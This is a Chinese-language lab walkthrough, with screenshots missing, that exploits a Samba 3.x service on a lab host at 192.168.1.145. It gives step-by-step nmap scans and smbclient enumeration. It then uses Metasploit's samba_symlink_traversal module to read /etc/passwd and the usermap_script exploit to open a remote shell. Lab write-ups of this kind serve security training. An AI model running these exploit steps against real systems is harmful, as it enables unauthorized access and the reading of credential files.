0x00 samba后门文件读取
操作:打开kali linux的命令控制台,输入msfconsole。
实验现象截图:
操作:msf > nmap -sS -A -Pn 192.168.1.145
实验现象截图:
由扫描结果可见,该操作系统正运行这Samba3.x服务,该服务当配置为文件权限可写同时"wide links" 被允许(默认就是允许),同样可以被作为后门而不仅仅是文件共享
操作:smbclient –L //192.168.1.145
实验现象截图:
操作:msf > use auxiliary/admin/smb/samba_symlink_traversal
实验现象截图:
操作:msf auxiliary(samba_symlink_traversal) > show options
实验现象截图:
从show option输出的结果来看,还需要设置RHOST(靶机)ip地址和SMBSHARE(共享的文件夹)
操作:msf auxiliary(samba_symlink_traversal) > set rhost 192.168.1.145
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
实验现象截图:
操作:msf auxiliary(samba_symlink_traversal) > exploit
实验现象截图:
操作:root@kali:~# smbclient //192.168.1.145/tmp
smb: \> cd rootfs\
smb: \> cd etc\
smb: \> rootfs\etc\> more passwd
实验现象截图:
操作:打开kali linux的命令控制台,输入msfconsole。
实验现象截图:
操作:msf> nmap –sS –A --script=vuln -Pn 192.168.1.145
实验现象截图:
由扫描结果可见,该操作系统为ubuntu,正运行这Samba3.x服务和Apache 2.2.3服务。猜测可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit。
操作:msf > use multi/samba/usermap_script
实验现象截图:
操作:msf exploit(usermap_script) > show options
实验现象截图:
从show option输出的结果来看,还需要设置RHOST(靶机)ip地址。
操作:msf exploit(usermap_script) > set rhost 192.168.1.145
实验现象截图:
操作:msf exploit(usermap_script) > exploit
实验现象截图:
已成功建立shell会话,可通该界面对靶机进行控制